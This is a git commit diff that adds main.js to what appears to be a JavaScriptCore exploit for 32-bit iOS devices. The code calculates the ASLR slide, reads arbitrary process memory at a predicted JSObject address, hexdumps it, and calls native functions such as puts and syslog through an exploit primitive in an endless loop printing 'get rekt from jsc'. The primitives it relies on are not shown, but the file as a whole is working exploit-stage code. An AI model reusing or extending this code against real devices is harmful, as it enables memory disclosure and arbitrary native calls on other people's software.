diff options
| author | spv420 <unomilliono@gmail.com> | 2022-04-23 18:22:31 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-23 18:22:31 -0400 |
| commit | 245a3831d7266913b0281bfa19058b59ac80818b (patch) | |
| tree | d20043b79a8df535a7df9b1d19c249e6ebd2d5a1 /src/js/main.js | |
| parent | 8526f9689b7bbeb09a14fbd159ef6d1871909df4 (diff) | |
big b0i
Diffstat (limited to 'src/js/main.js')
| -rw-r--r-- | src/js/main.js | 58 |
1 files changed, 58 insertions, 0 deletions
diff --git a/src/js/main.js b/src/js/main.js new file mode 100644 index 0000000..dd7f1f0 --- /dev/null +++ b/src/js/main.js @@ -0,0 +1,58 @@ +/* + * november 24th 2021 + * [3:16 PM] spv: spice confuses the shit out of me, so i'm prolly not smart enough to implement it anyway + * + * ohai + */ + +var MAX_SLIDE = 0x3; +var MIN_SLIDE = 0x1; + +try { + log("we out here in jsc"); +} catch (e) { + /* + * we don't have log. :( + */ + + log = function (){}; +} + +function main() { + /* + * get slide and calculate slid base + * remember, 32-bit *OS defaults to 0x4000 for the unslid base for exec's + * + * so, take the slide, shift it by 12 bits (aslr is calc'd by taking a + * random byte and shifting it 12 bits, in this case the page size, 4096 + * (0x1000) bytes), and add it to the unslid base. + */ + + slide = get_our_slide(); + base = 0x4000 + (slide << 12); + slid = (slide << 12); + + init_sptr_heap(); + + calls4arg("puts\0", sptr("we out here\0"), 0, 0, 0); + + log("slide=0x" + slide.toString(16)); + log("*(uint8_t*)base = 0x" + read_u8(base).toString(16)); + log("*(uint16_t*)base = 0x" + read_u16(base).toString(16)); + log("*(uint32_t*)base = 0x" + read_u32(base).toString(16)); + + predicted_jsobject_addy = 0x422200; + buf = read_buf(predicted_jsobject_addy, 0x200); + + log("hexdump of predicted jsobject loc:"); + log(hexdump(buf, 8, 2, predicted_jsobject_addy, 8, "0x")); + + var i = 0; + while (true) { + calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0); + calls4arg("sleep", 0, 0, 0, 0); + i++; + } + + log("still alive"); +}; |